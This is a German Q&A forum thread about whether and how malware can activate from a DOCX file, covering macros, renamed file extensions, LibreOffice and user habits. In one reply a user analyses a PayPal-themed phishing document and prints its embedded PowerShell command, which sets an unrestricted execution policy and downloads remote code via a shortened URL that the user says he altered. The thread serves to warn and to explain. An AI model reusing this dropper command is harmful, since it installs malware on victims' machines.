Wie aktiviert sich ein Computervirus in einer DOCX-Word-Datei?

3 Antworten

Datei-Extensions sollten nie der einzige Hinweis auf Sicherheit sein,
weil sie einfach nachzuahmen sind. Auch kann Office Dateien öffnen und
lesen, wenn deren Extension geändert wurde. Als Schutz vor
Makro-basierten Angriffen ist es empfehlenswert, die Makrosicherheits-Funktionalität in Office-Anwendungen zu aktivieren.

https://blog.trendmicro.de/makros-als-infektionsvektor-sind-wieder-da/

Man könnte also zum Beispiel eine DOCM-Datei erstellen, mit den passenden Makros versehen und diese anschließend in eine DOCX umbenennen. Schon funktionieren Makros auch in DOCX.

In Bezug auf LibreOffice heißt es:

Bis auf wenige Ausnahmen können Microsoft Office und LibreOffice nicht dieselben Makro-Codes ausführen.

https://help.libreoffice.org/Common/Using_Microsoft_Office_and/de#Makros_in_Microsoft_Office_und_LibreOffice

Die Chancen, mit einem für MS Office programmierten Makro in LibreOffice infiziert zu werden, sind in der Tat gering, da MS Office und LibreOffice unterschiedliche Objekte und Methoden bei der Makroprogrammierung nutzen. Komplett ausgeschlossen wird diese Möglichkeit aber nicht.

Es wäre somit heikel, sich in Sicherheit zu wiegen, weil die Datei eine bestimmte Endung hat oder nur noch mit einer bestimmten Anwendung geöffnet wird.

Bist du sicher?
Das Speicherformat docx zu docm ist ja derart unterschiedlich, dass Office normalerweise nach dem Umbenennen einfach meldet die Datei sei nicht lesbar.

0
@Jackie251

Sicher bin ich mir nicht. Ich beschäftige mich natürlich auch nicht den ganzen Tag mit dem Entwickeln von Angriffsmethoden dieser Art. ;)

Wenn aber Unternehmen, die sich mit dem Thema IT-Sicherheit diesbezüglich beschäftigen, auf diese Art zur Vorsicht mahnen, vertraue ich lieber deren Aussage, statt mich zu sehr in Sicherheit zu wiegen.

0
@stboy

Okay
Umwege bietet die PC Welt natürlich immer. Aber ich meine doch das auf die Idee schon viele gekommen wären, wenn es so einfach wäre ;-)

0
@Jackie251

Potentielle Angreifer stürzen sich natürlich gerne auf Methoden, mit denen sie möglichst viele Ziele bei geringstem Aufwand treffen können. Da Makros heutzutage nicht mehr so freiwillig aktiviert werden, gerieten derartige Möglichkeiten in Vergessenheit.

Aber gerade das birgt ja die Gefahr. Denkt man nicht mehr an die Risiken in diesem Bereich, wird man unvorsichtig. Werden viele Menschen unvorsichtig, wird die Methode wieder interessant für Angreifer.

Genauso verhält es sich mit MS Office und Libre Office. Würde die breite Masse nun auf einmal sagen: "Libre Office ist sicher. Drum öffne ich nur noch damit.", wären Makros bald auch für dieses höchst interessant.

Von daher ist Linux auch nur so lange "sicher", bis eine Distribution den kompletten Markt erobert. ;)

0
@stboy

Wenn ich eine DOCM-Datei, welche ein Makro enthält, in DOCX umbenenne und mit MS-Word2016 öffne, kommt die Fehlermeldung "The Open XML file ...docx cannot be opened because there are problems with the contents". Wenn ich eine DOC-Datei, welche ein Makro enthält, in DOCX umbenenne und mit MS-Word2016 öffne, kommt die Fehlermeldung "Word can't open because the file format does not match the file extension".

Aber jetzt wird's spannend: Wenn ich besagte Datei "paypal-kaeuferschutz-PP-006-824-772-751.docx" in einer geschützten Umgebung mit MS-Word2016 öffne, kommt weder die eine noch die andere dieser beiden Fehlermeldungen, auch keine Aufforderung durch Word, irgendetwas zu aktivieren.

Jedoch sehe ich eine Grafik mit der Aufschrift "Paypal Sicherheitszertifikat - PP-006-824-772-751.lnk". Ein Doppelklick auf diese Grafik erzeugt ein Pop-Up mit dem Warnhinweis "Paketinhalt öffnen - Sicherheitswarnung - Möchten Sie diese Datei öffnen?", was ich dankend ablehne.

Ein Rechtsklick auf die Grafik offenbart mir, dass ein Doppelklick den Befehl

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c Set-ExecutionPolicy Unrestricted -Force -Scope CurrentUser;&powershell -ep bypass -E "(New-Object Net.WebClient).DownloadString('htt'+'p://bit.ly/3kfkxnq')";&powershell;

ausführen würde. Man möge mir verzeihen, dass ich den Original-Code an der Stelle "bit.ly/3kfkxnq" modifiziert habe, damit niemand auf die Idee kommt, es tatsächlich auszuprobieren. Aktuell zeigt die bit.ly-Adresse auf eine URL à la https://a.pomf.space/bpncaxwbqmec.txt (hab ich ebenfalls modifiziert) und es wird ein ca. 5kB großer Text à la bgB6ADYAMQBPAGQASgBmAEkARQBGAE8AVABzAEIASABXAFcAaABx... (und so weiter) angezeigt.

Ich denke, damit wäre es so gut wie bewiesen, dass man sich auch über DOCX-Dateien was ganz Böses einfangen kann. Allerdings muss man da als User schon aktiv mitarbeiten und diese Datei / dieses Objekt "Paypal Sicherheitszertifikat - PP-006-824-772-751.lnk" doppelklicken. Der Aufforderung im DOCX-Dokument "Um die volle Ansicht dieses Dokuments zu aktivieren, klicken Sie bitte auf den umrahmten Button oben und bestätigen Sie das für die Ansicht dieser Nachricht gültige Sicherheitszertifikat" sollte man also nicht Folge leisten.

Vielen Dank übrigens an alle, die Antworten geliefert haben.

1
@RobertBecker

Ich denke mal, es gehört nicht nur meine Mutter zu den Usern, die immer wieder mit der Aussage kommt: "Die haben doch geschrieben, ich soll das machen!" :D

An aktiven Usern mangelt es auf gar keinen Fall.

Vielen Dank für die ausführliche Info!

0
@RobertBecker

Wenn ich das mit meinem Word nachvollziehe kommt immer eine Fehlermeldung wenn eine docm die in docx umbenannt wurde versucht wird zu öffnen.

Werde ich bei Gelegenheit nochmal mit der 365er Version probieren.

0

Bist du wirklich ganz sicher das es sich um eine DOCX handelt?

Gerne verwendet werden ja Doppelte Endungen, also zB
LiesMich.DOCX.DOC
In der Windowsstandardeinstellung werden die Endungen ausgeblendet und dieser Datei dann als LiesMich.DOCX angezeigt oder es gar keine DOCX ist.

In einer richtigen DOCX müsste man schon etwas nachladen, zB mit einem Link den man aktiviert.

1. Makroviren sind immer noch im Umlauf, obwohl Makros standardmäßig in neueren Office-Versionen deaktiviert sind. man würde von solchen Dokumenten aufgefordert werden diese zu aktivieren und dergleichen.

Man würde denken das sei etwas ineffizient, aber es gibt immer noch Leute die gleich drauf los klicken...

2. Diese Viren sind meist in VBA geschrieben, wodurch OpenOffice usw. sie nicht ausführt, aber es gibt auch Viren die bei diesen Programmen wirken.

Hi Benno399, dein Argument zu Frage #1 würde stimmen, wenn es sich um ein DOC oder DOCM-Datei gehandelt hätte. Aber bei DOCX-Dateien würde Word ein eventuell enthaltenes Makro gar nicht aktivieren können, es würde also den User nicht mal fragen, ob er es aktivieren möchte, das Makro würde also gar nicht starten können. Lieg ich da falsch? 

Zu deiner Antwort auf Frage #2: Heißt das, VBA-Makros laufen nur in Word und nicht in LibreOffice/OpenOffice, es gibt aber noch andere, Non-VBA-Makros, und nur die könnten in LibreOffice/OpenOffice als Makrovirus zuschlagen?

0
@RobertBecker

im Bezug auf Makros hast du recht, da docx eigentlich nur ein geziptes XML-Dokument ist. Bei docm und doc verhält es sich anders. trotzdem lässt sich sicherlich auf verschiedenste weisen Schadcode verstecken und ich glaub das kaum ein einfacher Nutzer zu starkt auf Dateiendungen achtet, wenn die Mail nicht zu verräterisch ist.

VBA wird in vielen Anwendungen verwendet. Alle MS Office Tools, aber auch einige Lizenzen wie Makros für Corel, AutoCAD, ...

VBA stammt von Microsofts Viusal Basic ab, während OpenOffice Basic Code verwendet, weshalb gewisse Elemente sehr ähnlich/gleich sind.

0

Warum sollte das ineffezient sein?
Ja der "Experte" sagt sehr leicht "warum klicken die Leute da auf ja/aktivieren".

Aber wie sieht denn die Arbeit für viele Anwender aus?
Treiber, Programmupdate, neue Software - ständig wird der Anwender gebeten irgendwas zu aktivieren oder akzeptieren.

In vielen Arbeitsumgebungen gibt es auch regelmäßig irgendwas mit Makros. Seie es eine Zeitverwaltung in Excel oder eine automatisch "gelesen" Bestädigung eines Word Dokuments.
Und auch nach 10 Jahren gibt es in der realen Arbeitswelt noch ettliche alte DOC Vorlagen und Co.

Die meisten Anweder haben daher gar nicht dümmlich das Virus aktiviert, sondern aktivieren jährlich hunderte Abfragen. Und da der Mensch nunmal Gewohnheitstier ist, wird irgendwann automatisch auf "ja" geklickt.
Die Abfragen sind oftmals nicht auf dem Papier sinnvoll, im praktischen Einsatz MUSS der Laie hier Fehler machen.

0

Was möchtest Du wissen?